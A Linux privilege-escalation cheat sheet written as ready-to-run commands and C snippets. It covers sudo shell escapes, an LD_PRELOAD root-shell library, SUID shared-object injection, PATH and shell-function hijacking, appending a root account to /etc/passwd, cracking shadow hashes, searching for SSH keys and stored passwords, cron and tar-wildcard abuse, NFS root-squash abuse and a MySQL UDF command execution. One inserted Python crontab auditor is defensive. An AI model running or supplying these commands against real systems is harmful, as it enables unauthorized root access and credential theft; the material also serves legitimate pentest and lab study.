Test For Kernel Exploits
Test For sudo permissions
General Scoping
grep -Ri 'db' /var/www --color=auto
grep -Ri 'sql' /var/www --color=auto
grep -Ri '$db_name' /var/www --color=auto
ls -ls /etc
Look for anything owned by something other than root:root, root:fuse, root:shadow or root:dip.
ls -lsa /etc | grep -i '.secret'
ls -lsaR /var/spool/mail
Vulnerable Driver Discovery
List drivers
Get libata driver information and version
Test SUDO
Reference https://gtfobins.github.io/
Nano
sudo find /bin -name nano -exec /bin/sh \;
Awk
sudo awk 'BEGIN {system("/bin/sh")}'
Nmap
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
Vim
LD_PRELOAD
Create the file malicious.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>  /* declares setgid() and setuid() */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile and load:
gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles
sudo LD_PRELOAD=/tmp/malicious.so apache2
Shared Object Injection
find / -type f -perm -04000 -ls 2>/dev/null
Run strace on the SUID binaries found to locate a missing shared object such as "foundso.so":
strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"
mkdir /home/user/.config
cd /home/user/.config
Create foundso.c:
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -o /home/user/.config/foundso.so -fPIC /home/user/.config/foundso.c
/usr/local/bin/somesuid
sudo apache2 -f /etc/shadow
Test SUID files
Reference https://gtfobins.github.io/ and search for the rest not listed there.
find / -perm /4000 2> /dev/null
Test /etc/passwd & /etc/shadow
Test whether /etc/passwd or /etc/shadow is readable or writeable:
ls -la /etc/passwd /etc/shadow
Only if both are readable:
unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
Writable /etc/passwd
openssl passwd thescriptkid
echo 'thescriptkid:$1$ZEx4UyBv$/2BpqiGuy7vuNC7X9SsTO0:0:0:thescriptkid:/home/thescriptkid:/bin/bash' >> /etc/passwd
Stored Passwords & Keys
OVPN Files
find / -iname "*.ovpn" 2> /dev/null
find / -iname "config" 2> /dev/null | grep -i "irssi"
cat filename | grep -i passw
Bash History
cat /home/*/.bash_history | grep -i passw
SSH Keys
find / -name id_rsa 2> /dev/null
ssh -i id_rsa someuser@$ip
Abusing Intended Functionality
Symlinks
Environment Variables
Path
find / -type f -perm -04000 -ls 2>/dev/null
strings /usr/local/bin/onfoundsuid
C functions such as setresgid, setresuid, and system are of interest and should be investigated. Commands invoked by relative path, such as "service apache2 start", can be abused.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/onfoundsuid
Functions, ShellOpts & PS4
find / -type f -perm -04000 -ls 2>/dev/null
strings /usr/local/bin/onfoundsuid
C functions such as setresgid, setresuid, and system are of interest and should be investigated. Commands invoked by absolute or relative path, such as "service", can be abused by defining functions of the same name in the current shell session.
Method 1
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
/usr/local/bin/onfoundsuid
Method 2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/onfoundsuid; set +x; /tmp/bash -p'
Capabilities
getcap -r / 2>/dev/null
Python 2.6
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Cron
cat /var/spool/cron/crontabs/root
Path
This abuses a misconfigured PATH in /etc/crontab. If the user has write permissions to a directory that is in that PATH, create a file with the same name as the cron job's command, with malicious contents.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /writeable/directory/somefile
chmod +x /writeable/directory/somefile
Wildcards
Tar
Exploitable if a cron job script uses tar with a wildcard *, for example: tar czf /tmp/backup.tar.gz *
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
Wait for execution
File Overwrite
Exploitable if the script is writeable by the current user:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/writable/writablescript
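The three cron weaknesses above (a writable directory in the crontab PATH, tar run with a wildcard, and a writable script run as root) are all visible from a system crontab plus a list of what a low-privileged user can write to. The audit below is an added example from the defender's side, not part of the original page; the crontab text and the writable sets are constructed, and in practice the caller would fill the sets from the real filesystem.

```python
import os
import shlex

# Constructed sample /etc/crontab for this example (not taken from a real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/home/user:/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root overwrite.sh
*/5 * * * * root tar czf /tmp/backup.tar.gz *
0 3 * * * root /usr/local/bin/compress.sh
"""


def audit_crontab(text, writable_dirs, writable_files=()):
    """Return (line, reason) findings; writable_dirs and writable_files are
    the PATH directories and script paths a low-privileged user can write to."""
    findings = []
    path_dirs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_dirs = line[len("PATH="):].split(":")
            continue
        if "=" in line.split()[0]:          # other VAR=value lines
            continue
        fields = line.split(None, 6)        # m h dom mon dow user command
        if len(fields) < 7:
            continue
        argv = shlex.split(fields[6])
        prog = argv[0]
        # Relative command name: cron resolves it through PATH, so a writable
        # PATH directory lets a same-named file shadow the real binary.
        if "/" not in prog:
            for d in path_dirs:
                if d in writable_dirs:
                    findings.append((raw, f"'{prog}' resolves via writable PATH dir {d}"))
                    break
        # tar with a shell wildcard: file names that look like options are parsed as options.
        if os.path.basename(prog) == "tar" and any(a == "*" or a.endswith("/*") for a in argv[1:]):
            findings.append((raw, "tar invoked with a wildcard argument"))
        # Script run as root that a low-privileged user can append to.
        if prog in writable_files:
            findings.append((raw, f"script {prog} is writable"))
    return findings
```

Note that the PATH check flags every writable PATH directory; only directories searched before the one holding the real binary actually shadow it, so confirm the order against the real PATH.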
NFS Root Squashing
Victim Machine
Kali Machine
mount -o rw,vers=2 ip:/tmp /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/thescriptkid.c
gcc /tmp/1/thescriptkid.c -o /tmp/1/thescriptkid
chmod +s /tmp/1/thescriptkid
Victim Machine
Mysql
Prerequisites - a valid database
CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';
select sys_eval("cp /bin/bash /var/tmp/bash ; chmod u+s /var/tmp/bash");
Run LinPEAS
Try passwords found in PHP config files